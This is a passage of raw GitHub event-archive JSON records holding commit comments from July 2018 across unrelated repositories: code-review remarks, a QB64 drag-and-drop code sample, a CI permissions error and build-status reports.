{"id":"8044075680","type":"CommitCommentEvent","actor":{"login":"h-o-g-e"},"repo":{"name":"h-o-g-e/tukaitaosu"},"payload":{"comment":{"id":29904166,"position":5,"line":3,"path":"okonomi.txt","commit_id":"87fd7237dfbd23dd6c073660530ab006b695e750","created_at":"2018-07-31T13:28:24Z","updated_at":"2018-07-31T13:28:24Z","author_association":"OWNER","body":"いいねぇ"}},"created_at":"2018-07-31T13:28:24Z"}
{"id":"8044077843","type":"CommitCommentEvent","actor":{"login":"FellippeHeitor"},"repo":{"name":"Galleondragon/qb64"},"payload":{"comment":{"id":29904170,"position":null,"line":null,"path":null,"commit_id":"975408e2ef41549a45d3bd22c8d61bc7aaf7e41d","created_at":"2018-07-31T13:28:45Z","updated_at":"2018-07-31T13:28:45Z","author_association":"COLLABORATOR","body":"```\r\nSCREEN _NEWIMAGE(128, 25, 0)\r\n\r\n_ACCEPTFILEDROP ON\r\n\r\nDO\r\n    PRINT \"Drag files from a folder and drop them in this window...\"\r\n\r\n    DO UNTIL _TOTALDROPPEDFILES > 0: _LIMIT 30: LOOP\r\n\r\n    PRINT _TOTALDROPPEDFILES; \" files/folders dropped;\"\r\n\r\n    FOR i = 1 TO _TOTALDROPPEDFILES\r\n        a$ = _DROPPEDFILE(i)\r\n        COLOR 15\r\n        IF _FILEEXISTS(a$) THEN\r\n            COLOR 2: PRINT \"file\",\r\n        ELSE\r\n            IF _DIREXISTS(a$) THEN\r\n                COLOR 3: PRINT \"folder\",\r\n            ELSE\r\n                COLOR 4: PRINT \"not found\", 'highly unlikely, but who knows?\r\n            END IF\r\n        END IF\r\n        COLOR 15\r\n        PRINT a$\r\n    NEXT\r\n    _FINISHDROP\r\n\r\n    _LIMIT 30\r\nLOOP\r\n```"}},"created_at":"2018-07-31T13:28:45Z"}
{"id":"8044081302","type":"CommitCommentEvent","actor":{"login":"filipnavara"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29904188,"position":14,"line":158,"path":"src/System.Security.Cryptography.X509Certificates/src/Internal/Cryptography/Helpers.cs","commit_id":"a86ecc09e5a6c2b91051b198e93bb12af046f777","created_at":"2018-07-31T13:29:19Z","updated_at":"2018-07-31T13:29:19Z","author_association":"CONTRIBUTOR","body":"Ok, will do."}},"created_at":"2018-07-31T13:29:19Z"}
{"id":"8044083133","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"marco-c/mozilla-releng-services"},"payload":{"comment":{"id":29904206,"position":null,"line":null,"path":null,"commit_id":"a396527bd5c2be293da73fb67a953753fe741e66","created_at":"2018-07-31T13:29:37Z","updated_at":"2018-07-31T13:29:37Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:route:index.project.releng.services.requests.master.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.master.by-timestamp.1533043777824\",\n    \"queue:route:index.project.releng.services.requests.master.by-revision.a396527bd5c2be293da73fb67a953753fe741e66\",\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:repo:github.com/marco-c/mozilla-releng-services:branch:master\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:index.garbage.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:scheduler-id:taskcluster-github\",\n    \"queue:route:index.project.releng.services.requests.master.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.master.by-timestamp.1533043777824\",\n    \"queue:route:index.project.releng.services.requests.master.by-revision.a396527bd5c2be293da73fb67a953753fe741e66\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-31T13:29:37.862Z\n\n</details>"}},"created_at":"2018-07-31T13:29:37Z"}
{"id":"8044083374","type":"CommitCommentEvent","actor":{"login":"sensorhound-swaroopa"},"repo":{"name":"sensorhound-swaroopa/Spoon-Knife"},"payload":{"comment":{"id":29904207,"position":null,"line":null,"path":null,"commit_id":"d0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9","created_at":"2018-07-31T13:29:40Z","updated_at":"2018-07-31T13:29:40Z","author_association":"OWNER","body":"changed the file"}},"created_at":"2018-07-31T13:29:40Z"}
{"id":"8044083524","type":"CommitCommentEvent","actor":{"login":"pdjgit"},"repo":{"name":"RFJHaans/topicmodeling"},"payload":{"comment":{"id":29904208,"position":null,"line":null,"path":null,"commit_id":"87cbe196dbddd4e9000e8ab756849120c4c7ce17","created_at":"2018-07-31T13:29:41Z","updated_at":"2018-07-31T13:29:41Z","author_association":"NONE","body":"Great. d."}},"created_at":"2018-07-31T13:29:41Z"}
{"id":"8044083863","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-catalog"},"payload":{"comment":{"id":29904209,"position":17,"line":108,"path":"test/specs/test_admin_route.js","commit_id":"168a18b6a71925a5bf984ccf95849c902ddabb08","created_at":"2018-07-31T13:29:45Z","updated_at":"2018-07-31T13:29:45Z","author_association":"COLLABORATOR","body":"As we discussed earlier, we don't need to use the token here.  We are not actually testing the authentication plugin here so we can simulate that the request has already passed the authentication middleware in our tests by using `credentials` in the options.  The trick we were missing before was including a `scope` field as part of the credentials. "}},"created_at":"2018-07-31T13:29:45Z"}
{"id":"8044084308","type":"CommitCommentEvent","actor":{"login":"joseantoniogarciay"},"repo":{"name":"joseantonioECI/Reqres"},"payload":{"comment":{"id":29904213,"position":null,"line":null,"path":null,"commit_id":"d6b7eb420375450b3018a95e16d0c4c2a7139413","created_at":"2018-07-31T13:29:50Z","updated_at":"2018-07-31T13:29:50Z","author_association":"NONE","body":"If you have a server with an invalid certificate then you need this delegate to trust.\r\n\r\nDependency injection is always a good way to configure better a library."}},"created_at":"2018-07-31T13:29:50Z"}
{"id":"8044084331","type":"CommitCommentEvent","actor":{"login":"jarzab3"},"repo":{"name":"mdxmase/python-asip"},"payload":{"comment":{"id":29904215,"position":null,"line":null,"path":null,"commit_id":"17f6fc9066cf925fb4728baf31de056e6f52cbc8","created_at":"2018-07-31T13:29:50Z","updated_at":"2018-07-31T13:29:50Z","author_association":"COLLABORATOR","body":"Great job"}},"created_at":"2018-07-31T13:29:50Z"}
{"id":"8044084486","type":"CommitCommentEvent","actor":{"login":"jonathanperret"},"repo":{"name":"fbaiodias/buffer-loader"},"payload":{"comment":{"id":29904217,"position":null,"line":null,"path":null,"commit_id":"090d4990baf0cff2a83eeb75b07a438bd87f818f","created_at":"2018-07-31T13:29:51Z","updated_at":"2018-07-31T13:29:51Z","author_association":"CONTRIBUTOR","body":"The most common use case for `buffer-loader` is probably binary files, not text. So I would rather test here with a buffer containing non-text data, e.g. `const content = Buffer.from([0, 1, 2, 3])`. And drop the assertion on `buffer.toString()` which does not add anything IMHO."}},"created_at":"2018-07-31T13:29:51Z"}
{"id":"8044085251","type":"CommitCommentEvent","actor":{"login":"AndrewMorrisby"},"repo":{"name":"AndrewMorrisby/Visual-Studio-Stuff"},"payload":{"comment":{"id":29904219,"position":45,"line":45,"path":"Class1.cs","commit_id":"bcc47b9d47d6b0a7cdb093726b84108c768767d5","created_at":"2018-07-31T13:29:58Z","updated_at":"2018-07-31T13:29:58Z","author_association":"OWNER","body":"Ah i see!!\n\nLet me give that a go\n________________________________\nFrom: RMorrisby <notifications@github.com>\nSent: 31 July 2018 14:27\nTo: AndrewMorrisby/Visual-Studio-Stuff\nCc: AndrewMorrisby; Author\nSubject: Re: [AndrewMorrisby/Visual-Studio-Stuff] Hey Rich. I'm messing around with classes and properties. I'm getting the hang of creating classes, setting properties and constructors etc. HOWEVER i'm messing around with putting an IF statement in the ToStrin...\n\n\nOK. Remember that a vairable is a bucket that holds one object. Here s2 is holding an object which is a string, which has a value of \"Poor\". Line 46 is \"bool c = s2.Contains(s2);\" . If you read this out, substituting in values where possible, you get \"bool c = \"Poor\".Contains(\"Poor\");\" which is obviously going to be true, and will always be true, because you're not changing anything in there.\n\nAsk yourself what you want to be comparing against \"Poor\", and change the line so that it becomes \"bool c = .Contains(s2);\" OR \"bool c = s2.Contains();\"\n\n(when comparing two things like this, it doesn't really matter which is before the .Contains and which is inside the brackets)\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/AndrewMorrisby/Visual-Studio-Stuff/commit/bcc47b9d47d6b0a7cdb093726b84108c768767d5#commitcomment-29904139>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AnV95N7uP3VuXlWem9gaYWzWncMoCbzFks5uMFs8gaJpZM4VoPrD>.\n"}},"created_at":"2018-07-31T13:29:58Z"}
{"id":"8044085245","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29904220,"position":null,"line":null,"path":null,"commit_id":"16bfa0e843c29d6245631b4335f6e6ef0d47cc8d","created_at":"2018-07-31T13:29:59Z","updated_at":"2018-07-31T13:29:59Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1705 of 1705 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.41%25-green.png)</a>\n"}},"created_at":"2018-07-31T13:29:59Z"}
{"id":"8044089823","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29904235,"position":19,"line":19,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-31T13:30:43Z","updated_at":"2018-07-31T13:30:43Z","author_association":"OWNER","body":"da vse verno pereputal ...ispravil"}},"created_at":"2018-07-31T13:30:43Z"}
{"id":"8044090828","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29904238,"position":24,"line":24,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-31T13:30:53Z","updated_at":"2018-07-31T13:30:53Z","author_association":"OWNER","body":"toze verno ispravil"}},"created_at":"2018-07-31T13:30:53Z"}
{"id":"8044098526","type":"CommitCommentEvent","actor":{"login":"SolitudeSF"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29904265,"position":5,"line":4,"path":"srcpkgs/etr/template","commit_id":"eb6f4f25bcf8e61d5ac49a05e8601494fb2217ab","created_at":"2018-07-31T13:32:10Z","updated_at":"2018-07-31T13:32:10Z","author_association":"CONTRIBUTOR","body":"that doesnt look right"}},"created_at":"2018-07-31T13:32:10Z"}
{"id":"8044099779","type":"CommitCommentEvent","actor":{"login":"otavio"},"repo":{"name":"Freescale/kernel-module-imx-gpu-viv"},"payload":{"comment":{"id":29904267,"position":null,"line":null,"path":null,"commit_id":"6dd64fcbfc5ef0a82388dbffaf96150ad6d8c226","created_at":"2018-07-31T13:32:22Z","updated_at":"2018-07-31T13:32:22Z","author_association":"MEMBER","body":"Is it possible to extend the commit log to explain what issue it fixes?"}},"created_at":"2018-07-31T13:32:22Z"}
{"id":"8044101781","type":"CommitCommentEvent","actor":{"login":"Buggerfal"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29904269,"position":278,"line":278,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T13:32:41Z","updated_at":"2018-07-31T13:32:41Z","author_association":"OWNER","body":"rename all var"}},"created_at":"2018-07-31T13:32:41Z"}
{"id":"8044104654","type":"CommitCommentEvent","actor":{"login":"Buggerfal"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29904273,"position":279,"line":279,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T13:33:11Z","updated_at":"2018-07-31T13:33:11Z","author_association":"OWNER","body":"I don't understand"}},"created_at":"2018-07-31T13:33:11Z"}
{"id":"8044108931","type":"CommitCommentEvent","actor":{"login":"indexmod"},"repo":{"name":"indexmod/encyclopedia"},"payload":{"comment":{"id":29904280,"position":5,"line":7,"path":"_includes/footer-1.html","commit_id":"195813bc483e09c2a52d8e7d82c192d02fb3a72d","created_at":"2018-07-31T13:33:53Z","updated_at":"2018-07-31T13:33:53Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-31T13:33:53Z"}
{"id":"8044110977","type":"CommitCommentEvent","actor":{"login":"indexmod"},"repo":{"name":"indexmod/encyclopedia"},"payload":{"comment":{"id":29904285,"position":8,"line":4,"path":"_includes/footer-2.html","commit_id":"195813bc483e09c2a52d8e7d82c192d02fb3a72d","created_at":"2018-07-31T13:34:13Z","updated_at":"2018-07-31T13:34:13Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-31T13:34:13Z"}
{"id":"8044113682","type":"CommitCommentEvent","actor":{"login":"indexmod"},"repo":{"name":"indexmod/encyclopedia"},"payload":{"comment":{"id":29904293,"position":null,"line":null,"path":null,"commit_id":"195813bc483e09c2a52d8e7d82c192d02fb3a72d","created_at":"2018-07-31T13:34:38Z","updated_at":"2018-07-31T13:34:38Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-31T13:34:38Z"}
{"id":"8044116773","type":"CommitCommentEvent","actor":{"login":"adampbeardsley"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29904311,"position":null,"line":null,"path":null,"commit_id":"98d284ab65b9c9b11513ab11ccf2a3a6079d91d0","created_at":"2018-07-31T13:35:10Z","updated_at":"2018-07-31T13:35:10Z","author_association":"COLLABORATOR","body":"Hmm, this does sound concerning. We may have to take a step back and think of tricks. Out of curiosity, what is the dimensionality of the array being FFT'd? I thought they were ~128x128... on my laptop cpu doing 1000 128x128 FFTs takes 0.9s. Are these images actually bigger than that?"}},"created_at":"2018-07-31T13:35:10Z"}
{"id":"8044117547","type":"CommitCommentEvent","actor":{"login":"Harishchowdary319"},"repo":{"name":"Harishchowdary319/qtharish"},"payload":{"comment":{"id":29904313,"position":null,"line":null,"path":null,"commit_id":"da5738015ccab3ef197671b9704c25fa56e3c692","created_at":"2018-07-31T13:35:17Z","updated_at":"2018-07-31T13:35:17Z","author_association":"OWNER","body":"HARISH-1"}},"created_at":"2018-07-31T13:35:17Z"}
{"id":"8044119888","type":"CommitCommentEvent","actor":{"login":"Harishchowdary319"},"repo":{"name":"Harishchowdary319/qtharish"},"payload":{"comment":{"id":29904317,"position":null,"line":null,"path":null,"commit_id":"da5738015ccab3ef197671b9704c25fa56e3c692","created_at":"2018-07-31T13:35:38Z","updated_at":"2018-07-31T13:35:38Z","author_association":"OWNER","body":"Log in page was developped ."}},"created_at":"2018-07-31T13:35:38Z"}
{"id":"8044128054","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29904345,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-31T13:36:58Z","updated_at":"2018-07-31T13:36:58Z","author_association":"MEMBER","body":"OK, good that you were able to reproduce it, so that I know I'm not going mad, heh. I guess when yuo were testing the core and didn't experience any crashes, you had texture upscaling turned off."}},"created_at":"2018-07-31T13:36:58Z"}
{"id":"8044132771","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29904374,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T13:37:46Z","updated_at":"2018-07-31T13:37:46Z","author_association":"COLLABORATOR","body":"Huh, so I tried checking if `expand_home` was called as root (`if (geteuid() == 0)`) and did a `EUID_USER()` if so before running anything. And when I tried to restore the euid with `EUID_ROOT()` at the end (and even did a `EROOT_ASSERT()`, a function similar to `EUID_ASSERT()`), that function worked, but then `fs.c` broke on line 136 (where it tries to actually disable the file)."}},"created_at":"2018-07-31T13:37:46Z"}
{"id":"8044136137","type":"CommitCommentEvent","actor":{"login":"CultofRobots"},"repo":{"name":"jcorporation/myMPD"},"payload":{"comment":{"id":29904383,"position":null,"line":null,"path":null,"commit_id":"338b74f3f547ece3a76110bd3d3383eeaf2df01c","created_at":"2018-07-31T13:38:19Z","updated_at":"2018-07-31T13:38:19Z","author_association":"NONE","body":"Shouldn't line 24 of mkrelease.sh be the following: \r\n`if [ -f dist/buildtools/closure-stylesheets.jar ] && [ \"$java\" != \"\" ]`"}},"created_at":"2018-07-31T13:38:19Z"}
{"id":"8044139254","type":"CommitCommentEvent","actor":{"login":"kalingaRaju"},"repo":{"name":"kalingaRaju/circleci"},"payload":{"comment":{"id":29904392,"position":null,"line":null,"path":null,"commit_id":"2f2fda1d3b2a361f26d92ce043aa221ae6197a46","created_at":"2018-07-31T13:38:49Z","updated_at":"2018-07-31T13:38:49Z","author_association":"OWNER","body":"dfdvve"}},"created_at":"2018-07-31T13:38:49Z"}
{"id":"8044139308","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"otrv4/otrv4-prekey-server"},"payload":{"comment":{"id":29904393,"position":21,"line":400,"path":"otrv4-prekey-server.md","commit_id":"c820dba201556f252c2252549d417bacb5711cc9","created_at":"2018-07-31T13:38:50Z","updated_at":"2018-07-31T13:38:50Z","author_association":"CONTRIBUTOR","body":"Ah, great. Thanks - I wasn't sure how we express this operation."}},"created_at":"2018-07-31T13:38:50Z"}
{"id":"8044142909","type":"CommitCommentEvent","actor":{"login":"LukeSmithxyz"},"repo":{"name":"LukeSmithxyz/voidrice"},"payload":{"comment":{"id":29904403,"position":null,"line":null,"path":null,"commit_id":"112244afc8e70a96bb034d6077a13d0cb621cdd7","created_at":"2018-07-31T13:39:25Z","updated_at":"2018-07-31T13:39:25Z","author_association":"OWNER","body":"With the typical resize bindings, for example, resizing \"to the right\" will increase the selected width, even if that visually means it will be moving left. This is an oddity I got used to as an i3 user, but it's sort of strange. Eventually a user sent me this script that make it more natural.\r\n\r\nIt allows intuitive window resizing. If you resize \"to the right\" that will resize the windows in question in such a way that moves the border between them to the right visually."}},"created_at":"2018-07-31T13:39:25Z"}
{"id":"8044145052","type":"CommitCommentEvent","actor":{"login":"Harishchowdary319"},"repo":{"name":"Harishchowdary319/qtharish"},"payload":{"comment":{"id":29904411,"position":null,"line":null,"path":null,"commit_id":"da5738015ccab3ef197671b9704c25fa56e3c692","created_at":"2018-07-31T13:39:47Z","updated_at":"2018-07-31T13:39:47Z","author_association":"OWNER","body":"HARISH-1"}},"created_at":"2018-07-31T13:39:47Z"}
{"id":"8044145446","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29904415,"position":5,"line":30,"path":"pkgs/development/coq-modules/category-theory/default.nix","commit_id":"08bf0b7630afa8656bb36bd61fac8ce9b2aff613","created_at":"2018-07-31T13:39:51Z","updated_at":"2018-07-31T13:39:51Z","author_association":"CONTRIBUTOR","body":"@peti Thanks for reverting, this commit was the one that I thought had fixed the version update, but apparently there are problems with this one as well. I'll submit a new update within the next few weeks."}},"created_at":"2018-07-31T13:39:51Z"}
{"id":"8044147336","type":"CommitCommentEvent","actor":{"login":"ribet888"},"repo":{"name":"rapid7/metasploit-omnibus"},"payload":{"comment":{"id":29904420,"position":null,"line":null,"path":null,"commit_id":"6c42246d9902193a77a45902dda18e6cea17d83b","created_at":"2018-07-31T13:40:11Z","updated_at":"2018-07-31T13:40:11Z","author_association":"NONE","body":"\r\n`git pull`"}},"created_at":"2018-07-31T13:40:11Z"}
{"id":"8044148870","type":"CommitCommentEvent","actor":{"login":"ssorallen"},"repo":{"name":"tabwrangler/tabwrangler"},"payload":{"comment":{"id":29904422,"position":null,"line":null,"path":null,"commit_id":"01a0b6adbab8808347d5f7bc3f8bb4bb71f69a01","created_at":"2018-07-31T13:40:24Z","updated_at":"2018-07-31T13:40:24Z","author_association":"COLLABORATOR","body":"This also improves the stability of #216 by reducing state changes from N to a max of 1 for mass restoring/deleting tabs in the Corral Tab."}},"created_at":"2018-07-31T13:40:24Z"}
{"id":"8044150119","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29904427,"position":69,"line":76,"path":"src/main/java/ml/duncte123/skybot/commands/uncategorized/HelpCommand.java","commit_id":"e6e9de992ba134de05abd3021368e9282f57ec23","created_at":"2018-07-31T13:40:37Z","updated_at":"2018-07-31T13:40:37Z","author_association":"MEMBER","body":"Why are you uppercasing this twice? (first is on line 48)"}},"created_at":"2018-07-31T13:40:37Z"}
{"id":"8044151137","type":"CommitCommentEvent","actor":{"login":"kamik4ze"},"repo":{"name":"kamik4ze/kamik4ze.github.io"},"payload":{"comment":{"id":29904431,"position":null,"line":null,"path":null,"commit_id":"ef4f73b1e0f3d8cc78d16d4052ab322ff50c3d9b","created_at":"2018-07-31T13:40:47Z","updated_at":"2018-07-31T13:40:47Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-31T13:40:47Z"}
{"id":"8044154618","type":"CommitCommentEvent","actor":{"login":"alexcira"},"repo":{"name":"FWGS/xash3d-deploy"},"payload":{"comment":{"id":29904435,"position":null,"line":null,"path":null,"commit_id":"64c50e8ffcdb752029e2a75363a0bbf9423a121b","created_at":"2018-07-31T13:41:22Z","updated_at":"2018-07-31T13:41:22Z","author_association":"NONE","body":"Hi. Ehat is happening with tehe .apk build for android devices. I use this beta versions for a long time and I'm very pleased. Please tell me that the android support will not be stoped"}},"created_at":"2018-07-31T13:41:22Z"}
{"id":"8044155332","type":"CommitCommentEvent","actor":{"login":"musolinoa"},"repo":{"name":"Freescale/kernel-module-imx-gpu-viv"},"payload":{"comment":{"id":29904438,"position":null,"line":null,"path":null,"commit_id":"6dd64fcbfc5ef0a82388dbffaf96150ad6d8c226","created_at":"2018-07-31T13:41:29Z","updated_at":"2018-07-31T13:41:29Z","author_association":"NONE","body":"The problem is that if you have two (or more) processes running in separate PID namespaces it's possible (even likely) that the existing `_GetProcessID` returns the same value for distinct processes.  This causes `eglGetDisplay` to return `EGL_NO_DISPLAY` for the second and subsequent processes that the driver incorrectly determines to have the same PID."}},"created_at":"2018-07-31T13:41:29Z"}
{"id":"8044157354","type":"CommitCommentEvent","actor":{"login":"TheBentoBox"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29904445,"position":24,"line":69,"path":"src/main/java/ch/njol/skript/expressions/ExprIdOf.java","commit_id":"c904c55a27501c9ed681528b9620a3afd64cceb6","created_at":"2018-07-31T13:41:49Z","updated_at":"2018-07-31T13:41:49Z","author_association":"NONE","body":"He's checking specifically for an instance of `getMaterial` that accepts an integer as the parameter, AKA if the `getMaterial` override that returns the material from a block ID exists. "}},"created_at":"2018-07-31T13:41:49Z"}
{"id":"8044160030","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29904448,"position":69,"line":76,"path":"src/main/java/ml/duncte123/skybot/commands/uncategorized/HelpCommand.java","commit_id":"e6e9de992ba134de05abd3021368e9282f57ec23","created_at":"2018-07-31T13:42:15Z","updated_at":"2018-07-31T13:42:15Z","author_association":"MEMBER","body":"Uh yeah..."}},"created_at":"2018-07-31T13:42:15Z"}
{"id":"8044160605","type":"CommitCommentEvent","actor":{"login":"JohnSmithSB"},"repo":{"name":"JohnSmithSB/HelloWorldApp"},"payload":{"comment":{"id":29904450,"position":null,"line":null,"path":null,"commit_id":"cd0cada9754b9760eecfd11ab98af11579150d6f","created_at":"2018-07-31T13:42:19Z","updated_at":"2018-07-31T13:42:19Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-31T13:42:19Z"}
{"id":"8044160649","type":"CommitCommentEvent","actor":{"login":"JohnSmithSB"},"repo":{"name":"JohnSmithSB/HelloWorldApp"},"payload":{"comment":{"id":29904451,"position":null,"line":null,"path":null,"commit_id":"7bedbe032b5f3edf44fd55f81ade79d5c671b345","created_at":"2018-07-31T13:42:21Z","updated_at":"2018-07-31T13:42:21Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-31T13:42:21Z"}
{"id":"8044165473","type":"CommitCommentEvent","actor":{"login":"JessyD"},"repo":{"name":"OpenSourceBrain/WilsonCowan"},"payload":{"comment":{"id":29904472,"position":null,"line":null,"path":null,"commit_id":"2ce3af0b4cea0643cf959afbd52a96fd5e5ea737","created_at":"2018-07-31T13:43:07Z","updated_at":"2018-07-31T13:43:07Z","author_association":"CONTRIBUTOR","body":"@pgleeson I had forgotten to push the code :( But here is bash script (and comments in just one language :) )"}},"created_at":"2018-07-31T13:43:07Z"}
{"id":"8044172044","type":"CommitCommentEvent","actor":{"login":"admiral-pubhelp"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29904490,"position":null,"line":null,"path":null,"commit_id":"067b9e66f43225a43bcc38107f5220329af85ff8","created_at":"2018-07-31T13:44:09Z","updated_at":"2018-07-31T13:44:09Z","author_association":"NONE","body":"This domain should not be blocked.  It is not an adserver.  It is both a DMCA copyright access control domain and GDPR consent management domain to help users manage their privacy settings.  It should not be circumvented.  If you believe it has served an ad please advise, otherwise please remove asap.  Thank you."}},"created_at":"2018-07-31T13:44:09Z"}
{"id":"8044172228","type":"CommitCommentEvent","actor":{"login":"ZE3kr"},"repo":{"name":"ZE3kr/Cloudflare-CNAME-Setup"},"payload":{"comment":{"id":29904492,"position":null,"line":null,"path":null,"commit_id":"04e79f278babb88bc9ed4adde053326c6989fa21","created_at":"2018-07-31T13:44:11Z","updated_at":"2018-07-31T13:44:11Z","author_association":"OWNER","body":"Fix #4 "}},"created_at":"2018-07-31T13:44:11Z"}
{"id":"8044173745","type":"CommitCommentEvent","actor":{"login":"mohamedfadda"},"repo":{"name":"mohamedfadda/bashairmecca"},"payload":{"comment":{"id":29904494,"position":null,"line":null,"path":null,"commit_id":"50bebd7886ce88410fdf192f6c403b0a17944fbe","created_at":"2018-07-31T13:44:25Z","updated_at":"2018-07-31T13:44:25Z","author_association":"OWNER","body":"https://bashairmkh.info/moving-in-alriyadh/"}},"created_at":"2018-07-31T13:44:25Z"}
{"id":"8044179592","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29904508,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-31T13:45:21Z","updated_at":"2018-07-31T13:45:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment 